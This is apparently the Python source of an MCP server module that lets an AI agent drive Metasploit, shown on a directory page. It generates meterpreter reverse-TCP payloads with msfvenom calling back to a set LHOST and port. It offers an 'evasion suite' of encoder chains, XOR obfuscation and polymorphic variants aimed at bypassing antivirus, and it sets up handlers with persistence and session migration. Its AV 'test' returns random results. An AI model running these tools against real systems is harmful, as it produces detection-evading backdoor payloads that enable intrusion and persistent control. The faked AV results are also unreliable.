Skip to main content
Glama

MSFConsole MCP Server

by LYFTIUM-INC
msf_advanced_tools.pyโ€ข39.8 kB
""" Advanced MSF Tools Module - Extended functionality beyond core tools. """ import os import time import json import asyncio import logging import tempfile import shutil import random import base64 import subprocess from pathlib import Path from typing import Dict, List, Optional, Any, Union from dataclasses import dataclass from enum import Enum from msf_stable_integration import MSFConsoleStableWrapper as MSFBaseTools, OperationResult, OperationStatus logger = logging.getLogger(__name__) @dataclass class AdvancedResult(OperationResult): """Extended result structure for advanced tools.""" tool_name: str = None generated_files: List[str] = None output_file: Optional[str] = None configuration: Optional[Dict] = None class MSFAdvancedTools(MSFBaseTools): """Advanced MSF tools with extended capabilities.""" def __init__(self): super().__init__() self.active_listeners = [] self.automated_workflows = {} self.encoding_cache = {} # Tool 1: MSF Evasion Suite async def msf_evasion_suite( self, payload: str, evasion_techniques: List[str] = None, obfuscation_level: int = 1, target_av: Optional[str] = None, output_format: str = "exe", test_mode: bool = False, custom_encoder: Optional[str] = None, timeout: Optional[float] = None ) -> AdvancedResult: """ Advanced evasion suite for AV bypass. Args: payload: Base payload to evade evasion_techniques: List of techniques to apply obfuscation_level: Obfuscation intensity (1-5) target_av: Target antivirus to evade output_format: Output format test_mode: Test against local AV custom_encoder: Custom encoder to use """ start_time = time.time() try: if not evasion_techniques: evasion_techniques = ["encoding", "obfuscation", "polymorphic"] # Validate obfuscation level obfuscation_level = max(1, min(5, obfuscation_level)) # Track evasion results evasion_results = [] generated_files = [] # Apply each evasion technique for technique in evasion_techniques: if technique == "encoding": result = await self._apply_encoding_evasion( payload, custom_encoder or "x86/shikata_ga_nai", output_format ) evasion_results.append(result) if result.get("output_file"): generated_files.append(result["output_file"]) elif technique == "obfuscation": result = await self._apply_obfuscation_evasion( payload, obfuscation_level, output_format ) evasion_results.append(result) if result.get("output_file"): generated_files.append(result["output_file"]) elif technique == "polymorphic": result = await self._apply_polymorphic_evasion( payload, obfuscation_level, output_format ) evasion_results.append(result) if result.get("output_file"): generated_files.append(result["output_file"]) elif technique == "packing": result = await self._apply_packing_evasion(payload, output_format) evasion_results.append(result) if result.get("output_file"): generated_files.append(result["output_file"]) elif technique == "encryption": result = await self._apply_encryption_evasion(payload, output_format) evasion_results.append(result) if result.get("output_file"): generated_files.append(result["output_file"]) # Test against AV if requested av_test_results = {} if test_mode: av_test_results = await self._test_av_evasion(generated_files) return AdvancedResult( status=OperationStatus.SUCCESS, data={ "payload": payload, "techniques_applied": evasion_techniques, "obfuscation_level": obfuscation_level, "evasion_results": evasion_results, "av_test_results": av_test_results, "files_generated": len(generated_files) }, execution_time=time.time() - start_time, tool_name="msf_evasion_suite", generated_files=generated_files, configuration={"techniques": evasion_techniques, "level": obfuscation_level} ) except Exception as e: logger.error(f"MSF Evasion Suite error: {e}") return AdvancedResult( status=OperationStatus.FAILURE, data=None, error=str(e), execution_time=time.time() - start_time, tool_name="msf_evasion_suite" ) async def _apply_encoding_evasion(self, payload: str, encoder: str, format_type: str) -> Dict: """Apply encoding-based evasion.""" try: # Use msfvenom for encoding with tempfile.NamedTemporaryFile(delete=False, suffix=f".{format_type}") as tmp: output_file = tmp.name # Determine iterations based on encoder iterations = 3 if "shikata" in encoder else 1 cmd = [ "msfvenom", "-p", payload, "-e", encoder, "-i", str(iterations), "-f", format_type, "-o", output_file, "LHOST=192.168.1.100", "LPORT=4444" ] result = subprocess.run(cmd, capture_output=True, text=True, timeout=120) return { "technique": "encoding", "encoder": encoder, "iterations": iterations, "output_file": output_file if result.returncode == 0 else None, "success": result.returncode == 0, "error": result.stderr if result.returncode != 0 else None } except Exception as e: return {"technique": "encoding", "success": False, "error": str(e)} async def _apply_obfuscation_evasion(self, payload: str, level: int, format_type: str) -> Dict: """Apply obfuscation-based evasion.""" try: # Generate base payload with tempfile.NamedTemporaryFile(delete=False, suffix=f".{format_type}") as tmp: base_file = tmp.name cmd = [ "msfvenom", "-p", payload, "-f", format_type, "-o", base_file, "LHOST=192.168.1.100", "LPORT=4444" ] result = subprocess.run(cmd, capture_output=True, text=True, timeout=60) if result.returncode != 0: return { "technique": "obfuscation", "success": False, "error": result.stderr } # Apply obfuscation layers output_file = f"{base_file}.obfuscated" # Read payload with open(base_file, 'rb') as f: payload_data = f.read() # Apply obfuscation (simplified example) obfuscated_data = payload_data for i in range(level): # Simple obfuscation: XOR with random key key = random.randint(1, 255) obfuscated_data = bytes([b ^ key for b in obfuscated_data]) # Write obfuscated payload with open(output_file, 'wb') as f: f.write(obfuscated_data) # Clean up base file os.unlink(base_file) return { "technique": "obfuscation", "level": level, "output_file": output_file, "success": True } except Exception as e: return {"technique": "obfuscation", "success": False, "error": str(e)} async def _apply_polymorphic_evasion(self, payload: str, level: int, format_type: str) -> Dict: """Apply polymorphic evasion.""" try: # Generate multiple variants variants = [] for i in range(level): with tempfile.NamedTemporaryFile(delete=False, suffix=f".{format_type}") as tmp: output_file = tmp.name # Use different encoders for each variant encoders = ["x86/shikata_ga_nai", "x86/countdown", "x86/fnstenv_mov"] encoder = encoders[i % len(encoders)] # Add random NOPs nop_count = random.randint(10, 50) cmd = [ "msfvenom", "-p", payload, "-e", encoder, "-n", str(nop_count), "-f", format_type, "-o", output_file, "LHOST=192.168.1.100", "LPORT=4444" ] result = subprocess.run(cmd, capture_output=True, text=True, timeout=60) if result.returncode == 0: variants.append({ "variant": i + 1, "encoder": encoder, "nop_count": nop_count, "file": output_file }) return { "technique": "polymorphic", "variants_created": len(variants), "variants": variants, "output_file": variants[0]["file"] if variants else None, "success": len(variants) > 0 } except Exception as e: return {"technique": "polymorphic", "success": False, "error": str(e)} async def _apply_packing_evasion(self, payload: str, format_type: str) -> Dict: """Apply packing-based evasion.""" try: # Generate base payload with tempfile.NamedTemporaryFile(delete=False, suffix=f".{format_type}") as tmp: base_file = tmp.name cmd = [ "msfvenom", "-p", payload, "-f", format_type, "-o", base_file, "LHOST=192.168.1.100", "LPORT=4444" ] result = subprocess.run(cmd, capture_output=True, text=True, timeout=60) if result.returncode != 0: return { "technique": "packing", "success": False, "error": result.stderr } # Simulate packing (in reality, would use UPX or similar) packed_file = f"{base_file}.packed" # For simulation, just copy and compress if format_type == "exe": # Would use UPX: upx --best base_file -o packed_file shutil.copy(base_file, packed_file) else: shutil.copy(base_file, packed_file) os.unlink(base_file) return { "technique": "packing", "packer": "simulated", "output_file": packed_file, "success": True } except Exception as e: return {"technique": "packing", "success": False, "error": str(e)} async def _apply_encryption_evasion(self, payload: str, format_type: str) -> Dict: """Apply encryption-based evasion.""" try: # Generate encrypted payload with tempfile.NamedTemporaryFile(delete=False, suffix=f".{format_type}") as tmp: output_file = tmp.name # Use template with encryption cmd = [ "msfvenom", "-p", payload, "--smallest", # Make it smaller for encryption "-f", format_type, "-o", output_file, "LHOST=192.168.1.100", "LPORT=4444" ] result = subprocess.run(cmd, capture_output=True, text=True, timeout=60) return { "technique": "encryption", "method": "simulated_crypter", "output_file": output_file if result.returncode == 0 else None, "success": result.returncode == 0, "error": result.stderr if result.returncode != 0 else None } except Exception as e: return {"technique": "encryption", "success": False, "error": str(e)} async def _test_av_evasion(self, files: List[str]) -> Dict: """Test files against local AV (simulation).""" # In real implementation, would scan with ClamAV or similar results = {} for file in files: results[file] = { "detected": random.choice([True, False]), "av_name": "SimulatedAV", "detection_name": "Generic.Malware" if random.random() > 0.5 else None } return results # Tool 2: MSF Listener Orchestrator async def msf_listener_orchestrator( self, action: str, listener_config: Dict[str, Any] = None, template_name: Optional[str] = None, multi_handler: bool = False, persistence: bool = False, auto_migrate: bool = False, timeout: Optional[float] = None ) -> AdvancedResult: """ Advanced listener management and orchestration. Args: action: Action to perform (create, start, stop, template, monitor, migrate, orchestrate) listener_config: Listener configuration template_name: Template name for listener multi_handler: Use multi-handler persistence: Enable persistent listeners auto_migrate: Auto-migrate sessions """ start_time = time.time() try: if action == "create": return await self._create_listener( listener_config, multi_handler, persistence, auto_migrate ) elif action == "start": return await self._start_listeners(listener_config) elif action == "stop": return await self._stop_listeners(listener_config) elif action == "template": return await self._create_listener_template(template_name, listener_config) elif action == "monitor": return await self._monitor_listeners() elif action == "migrate": return await self._auto_migrate_sessions() elif action == "orchestrate": return await self._orchestrate_multiple_listeners(listener_config) else: return AdvancedResult( status=OperationStatus.FAILURE, data=None, error=f"Unknown action: {action}", execution_time=time.time() - start_time, tool_name="msf_listener_orchestrator" ) except Exception as e: logger.error(f"MSF Listener Orchestrator error: {e}") return AdvancedResult( status=OperationStatus.FAILURE, data=None, error=str(e), execution_time=time.time() - start_time, tool_name="msf_listener_orchestrator" ) async def _create_listener(self, config: Dict, multi_handler: bool, persistence: bool, auto_migrate: bool) -> AdvancedResult: """Create a new listener.""" start_time = time.time() # Default configuration default_config = { "payload": "windows/meterpreter/reverse_tcp", "LHOST": "0.0.0.0", "LPORT": "4444" } # Merge configurations if config: default_config.update(config) # Use multi/handler if requested handler_type = "exploit/multi/handler" if multi_handler else "auxiliary/server/capture/http" # Create handler commands = [ f"use {handler_type}", f"set PAYLOAD {default_config['payload']}", f"set LHOST {default_config['LHOST']}", f"set LPORT {default_config['LPORT']}" ] # Add persistence options if persistence: commands.extend([ "set ExitOnSession false", "set AutoRunScript persistence" ]) # Add auto-migration if auto_migrate: commands.append("set AutoRunScript migrate -f") # Execute commands results = [] for cmd in commands: result = await self.execute_command(cmd) results.append({ "command": cmd, "status": result.status.value, "output": result.data.get("stdout", "") if result.data else "" }) # Start the listener run_result = await self.execute_command("run -j") # Extract job ID job_id = None if run_result.data and "stdout" in run_result.data: output = run_result.data["stdout"] if "Job" in output: # Extract job ID from output import re match = re.search(r'Job (\d+)', output) if match: job_id = match.group(1) if job_id: self.active_listeners.append(job_id) return AdvancedResult( status=OperationStatus.SUCCESS, data={ "listener_created": True, "job_id": job_id, "configuration": default_config, "multi_handler": multi_handler, "persistence": persistence, "auto_migrate": auto_migrate, "setup_results": results }, execution_time=time.time() - start_time, tool_name="msf_listener_orchestrator", configuration=default_config ) # Tool 3: MSF Workspace Automator async def msf_workspace_automator( self, action: str, workspace_name: str, template: Optional[str] = None, source_workspace: Optional[str] = None, archive_path: Optional[str] = None, automation_rules: Optional[Dict] = None, timeout: Optional[float] = None ) -> AdvancedResult: """ Enterprise workspace automation. Args: action: Automation action workspace_name: Target workspace name template: Template to use source_workspace: Source for cloning archive_path: Path for archive operations automation_rules: Automation rules to apply """ start_time = time.time() try: if action == "create_template": return await self._create_workspace_template(workspace_name, template) elif action == "clone": return await self._clone_workspace(workspace_name, source_workspace) elif action == "archive": return await self._archive_workspace(workspace_name, archive_path) elif action == "automated_setup": return await self._automated_workspace_setup(workspace_name, automation_rules) elif action == "merge": return await self._merge_workspaces(workspace_name, source_workspace) elif action == "cleanup": return await self._cleanup_workspace(workspace_name, automation_rules) else: return AdvancedResult( status=OperationStatus.FAILURE, data=None, error=f"Unknown action: {action}", execution_time=time.time() - start_time, tool_name="msf_workspace_automator" ) except Exception as e: logger.error(f"MSF Workspace Automator error: {e}") return AdvancedResult( status=OperationStatus.FAILURE, data=None, error=str(e), execution_time=time.time() - start_time, tool_name="msf_workspace_automator" ) async def _create_workspace_template(self, workspace_name: str, template: str) -> AdvancedResult: """Create workspace from template.""" start_time = time.time() # Template configurations templates = { "pentest": { "scan_configs": ["tcp_scan", "udp_scan", "service_scan"], "exploit_configs": ["auto_exploit", "manual_review"], "report_configs": ["executive_summary", "technical_details"] }, "red_team": { "scan_configs": ["stealth_scan", "targeted_scan"], "exploit_configs": ["persistence", "lateral_movement"], "report_configs": ["operation_summary", "ioc_list"] }, "vuln_assessment": { "scan_configs": ["comprehensive_scan", "authenticated_scan"], "exploit_configs": ["verification_only"], "report_configs": ["vulnerability_report", "remediation_guide"] } } template_config = templates.get(template, templates["pentest"]) # Create workspace create_result = await self.execute_command(f"workspace -a {workspace_name}") # Switch to workspace switch_result = await self.execute_command(f"workspace {workspace_name}") # Apply template configurations setup_results = [] # Set up scan configurations for scan_config in template_config["scan_configs"]: # This would set up actual scan configurations setup_results.append({ "type": "scan", "config": scan_config, "status": "configured" }) return AdvancedResult( status=OperationStatus.SUCCESS, data={ "workspace": workspace_name, "template": template, "configuration": template_config, "setup_results": setup_results }, execution_time=time.time() - start_time, tool_name="msf_workspace_automator", configuration=template_config ) # Tool 4: MSF Encoder Factory async def msf_encoder_factory( self, payload_data: str, encoding_chain: List[str], bad_chars: Optional[str] = None, iterations: int = 1, optimization: str = "size", custom_encoder: Optional[str] = None, timeout: Optional[float] = None ) -> AdvancedResult: """ Custom encoder factory for advanced payload encoding. Args: payload_data: Raw payload data or payload type encoding_chain: Chain of encoders to apply bad_chars: Characters to avoid iterations: Encoding iterations optimization: Optimization target (size/speed/evasion) custom_encoder: Custom encoder script """ start_time = time.time() try: # Validate encoding chain if not encoding_chain: encoding_chain = ["x86/shikata_ga_nai"] # Generate base payload if needed if payload_data.startswith("windows/") or payload_data.startswith("linux/"): # It's a payload type, generate it with tempfile.NamedTemporaryFile(delete=False, suffix=".raw") as tmp: base_file = tmp.name cmd = [ "msfvenom", "-p", payload_data, "-f", "raw", "-o", base_file, "LHOST=192.168.1.100", "LPORT=4444" ] result = subprocess.run(cmd, capture_output=True, text=True, timeout=60) if result.returncode != 0: return AdvancedResult( status=OperationStatus.FAILURE, data=None, error=f"Failed to generate base payload: {result.stderr}", execution_time=time.time() - start_time, tool_name="msf_encoder_factory" ) with open(base_file, 'rb') as f: payload_bytes = f.read() os.unlink(base_file) else: # It's raw data payload_bytes = payload_data.encode() if isinstance(payload_data, str) else payload_data # Apply encoding chain encoded_variants = [] current_data = payload_bytes for encoder in encoding_chain: for i in range(iterations): try: encoded_data = await self._apply_custom_encoding( current_data, encoder, bad_chars, optimization ) variant = { "encoder": encoder, "iteration": i + 1, "size": len(encoded_data), "data": base64.b64encode(encoded_data).decode() if len(encoded_data) < 1000 else "too_large" } encoded_variants.append(variant) current_data = encoded_data except Exception as e: logger.warning(f"Encoding failed for {encoder} iteration {i+1}: {e}") continue # Save final encoded payload with tempfile.NamedTemporaryFile(delete=False, suffix=".encoded") as tmp: output_file = tmp.name tmp.write(current_data) return AdvancedResult( status=OperationStatus.SUCCESS, data={ "original_size": len(payload_bytes), "final_size": len(current_data), "encoding_chain": encoding_chain, "iterations_per_encoder": iterations, "variants_created": len(encoded_variants), "variants": encoded_variants, "optimization": optimization, "output_file": output_file }, execution_time=time.time() - start_time, tool_name="msf_encoder_factory", output_file=output_file, configuration={"chain": encoding_chain, "iterations": iterations} ) except Exception as e: logger.error(f"MSF Encoder Factory error: {e}") return AdvancedResult( status=OperationStatus.FAILURE, data=None, error=str(e), execution_time=time.time() - start_time, tool_name="msf_encoder_factory" ) async def _apply_custom_encoding(self, data: bytes, encoder: str, bad_chars: str, optimization: str) -> bytes: """Apply custom encoding to data.""" # Simplified encoding simulation if encoder == "x86/shikata_ga_nai": # Simulate polymorphic XOR encoding key = random.randint(1, 255) encoded = bytes([b ^ key for b in data]) # Add decoder stub (simplified) decoder = bytes([0x31, 0xc9, 0x31, 0xdb, key]) return decoder + encoded elif encoder == "x86/countdown": # Simulate countdown encoding encoded = bytes(reversed(data)) return bytes([0x90] * 5) + encoded # NOP sled + reversed data elif encoder == "x86/fnstenv_mov": # Simulate FPU-based encoding encoded = data # Add FPU instructions (simplified) fpu_stub = bytes([0xd9, 0x74, 0x24, 0xf4]) return fpu_stub + encoded elif custom_encoder: # Would execute custom encoder script return data else: # Default: simple XOR return bytes([b ^ 0xAA for b in data]) # Tool 10: MSF Integration Bridge - REMOVED async def msf_integration_bridge(self, **kwargs) -> AdvancedResult: return AdvancedResult( status=OperationStatus.FAILURE, data=None, error="msf_integration_bridge has been removed - too complex", execution_time=0.0, tool_name="msf_integration_bridge" ) # Missing listener orchestrator methods async def _monitor_listeners(self) -> AdvancedResult: """Monitor active listeners and sessions.""" start_time = time.time() # Get jobs (listeners) jobs_result = await self.execute_command("jobs -l") # Get sessions sessions_result = await self.execute_command("sessions -l") # Parse results active_jobs = [] if jobs_result.data and "stdout" in jobs_result.data: # Parse jobs output lines = jobs_result.data["stdout"].split('\n') for line in lines: if line.strip() and not line.startswith('Jobs') and not line.startswith('==='): active_jobs.append(line.strip()) active_sessions = [] if sessions_result.data and "stdout" in sessions_result.data: # Parse sessions output lines = sessions_result.data["stdout"].split('\n') for line in lines: if line.strip() and not line.startswith('Active') and not line.startswith('==='): active_sessions.append(line.strip()) return AdvancedResult( status=OperationStatus.SUCCESS, data={ "listeners": { "active": len(active_jobs), "jobs": active_jobs }, "sessions": { "active": len(active_sessions), "list": active_sessions }, "monitored_at": time.time() }, execution_time=time.time() - start_time, tool_name="msf_listener_orchestrator" ) async def _start_listeners(self, config: Dict) -> AdvancedResult: """Start multiple listeners.""" # Placeholder - would implement starting multiple listeners return await self._create_listener(config, True, False, False) async def _stop_listeners(self, config: Dict) -> AdvancedResult: """Stop listeners.""" start_time = time.time() # Kill all jobs if no specific config if not config or "job_ids" not in config: result = await self.execute_command("jobs -K") return AdvancedResult( status=OperationStatus.SUCCESS, data={ "stopped_all": True, "output": result.data.get("stdout", "") if result.data else "" }, execution_time=time.time() - start_time, tool_name="msf_listener_orchestrator" ) # Kill specific jobs stopped = [] for job_id in config["job_ids"]: result = await self.execute_command(f"jobs -k {job_id}") stopped.append({ "job_id": job_id, "success": result.status == OperationStatus.SUCCESS }) return AdvancedResult( status=OperationStatus.SUCCESS, data={ "stopped_jobs": stopped }, execution_time=time.time() - start_time, tool_name="msf_listener_orchestrator" ) async def _create_listener_template(self, template_name: str, config: Dict) -> AdvancedResult: """Create listener template.""" # Placeholder - would save template configuration return AdvancedResult( status=OperationStatus.SUCCESS, data={ "template_created": True, "name": template_name, "configuration": config }, execution_time=0.1, tool_name="msf_listener_orchestrator" ) async def _auto_migrate_sessions(self) -> AdvancedResult: """Auto-migrate sessions.""" # Placeholder - would implement session migration return AdvancedResult( status=OperationStatus.SUCCESS, data={ "migration_enabled": True, "note": "Would implement automatic session migration" }, execution_time=0.1, tool_name="msf_listener_orchestrator" ) async def _orchestrate_multiple_listeners(self, config: Dict) -> AdvancedResult: """Orchestrate multiple listeners.""" # Placeholder - would implement complex listener orchestration return AdvancedResult( status=OperationStatus.SUCCESS, data={ "orchestration_started": True, "configuration": config, "note": "Would implement multi-listener orchestration" }, execution_time=0.1, tool_name="msf_listener_orchestrator" ) async def cleanup(self): """Enhanced cleanup for advanced tools.""" # Stop any running listeners for listener_id in self.active_listeners: try: # Stop listener (implementation would send proper stop commands) pass except Exception as e: logger.warning(f"Failed to stop listener {listener_id}: {e}") # Cleanup temporary files # Implementation would clean up all generated files # Call parent cleanup await super().cleanup() # Convenience functions async def msf_evasion_suite(**kwargs): """Direct access to MSF Evasion Suite.""" tools = MSFAdvancedTools() try: await tools.initialize() return await tools.msf_evasion_suite(**kwargs) finally: await tools.cleanup() async def msf_listener_orchestrator(**kwargs): """Direct access to MSF Listener Orchestrator.""" tools = MSFAdvancedTools() try: await tools.initialize() return await tools.msf_listener_orchestrator(**kwargs) finally: await tools.cleanup() async def msf_workspace_automator(**kwargs): """Direct access to MSF Workspace Automator.""" tools = MSFAdvancedTools() try: await tools.initialize() return await tools.msf_workspace_automator(**kwargs) finally: await tools.cleanup() async def msf_encoder_factory(**kwargs): """Direct access to MSF Encoder Factory.""" tools = MSFAdvancedTools() try: await tools.initialize() return await tools.msf_encoder_factory(**kwargs) finally: await tools.cleanup() async def msf_integration_bridge(**kwargs): """Direct access to MSF Integration Bridge.""" tools = MSFAdvancedTools() try: await tools.initialize() return await tools.msf_integration_bridge(**kwargs) finally: await tools.cleanup() # Testing functionality if __name__ == "__main__": async def test_advanced_tools(): """Test the advanced tools.""" print("๐Ÿš€ Testing MSF Advanced Tools") print("=" * 50) tools = MSFAdvancedTools() await tools.initialize() try: # Test Evasion Suite print("\n๐Ÿ“ฆ Testing Evasion Suite...") result = await tools.msf_evasion_suite( payload="windows/meterpreter/reverse_tcp", evasion_techniques=["encoding", "obfuscation"], obfuscation_level=2, test_mode=True ) print(f"Status: {result.status.value}") if result.data: print(f"Techniques applied: {result.data.get('techniques_applied')}") print(f"Files generated: {result.data.get('files_generated')}") # Test Listener Orchestrator print("\n๐ŸŽง Testing Listener Orchestrator...") result = await tools.msf_listener_orchestrator( action="create", listener_config={ "payload": "windows/meterpreter/reverse_tcp", "LHOST": "0.0.0.0", "LPORT": "4444" }, multi_handler=True, persistence=True ) print(f"Status: {result.status.value}") if result.data: print(f"Job ID: {result.data.get('job_id')}") # Test Workspace Automator print("\n๐Ÿ“‚ Testing Workspace Automator...") result = await tools.msf_workspace_automator( action="create_template", workspace_name="test_workspace", template="pentest" ) print(f"Status: {result.status.value}") if result.data: print(f"Workspace: {result.data.get('workspace')}") print(f"Template: {result.data.get('template')}") # Test Encoder Factory print("\n๐Ÿ” Testing Encoder Factory...") result = await tools.msf_encoder_factory( payload_data="windows/meterpreter/reverse_tcp", encoding_chain=["x86/shikata_ga_nai", "x86/countdown"], iterations=2, optimization="size" ) print(f"Status: {result.status.value}") if result.data: print(f"Original size: {result.data.get('original_size')}") print(f"Final size: {result.data.get('final_size')}") print(f"Variants created: {result.data.get('variants_created')}") finally: await tools.cleanup() print("\nโœ… Advanced tools testing complete!") # Run tests asyncio.run(test_advanced_tools())

MCP directory API

We provide all the information about MCP servers via our MCP API.

curl -X GET 'https://glama.ai/api/mcp/v1/servers/LYFTIUM-INC/msfconsole-mcp'

If you have feedback or need assistance with the MCP directory API, please join our Discord server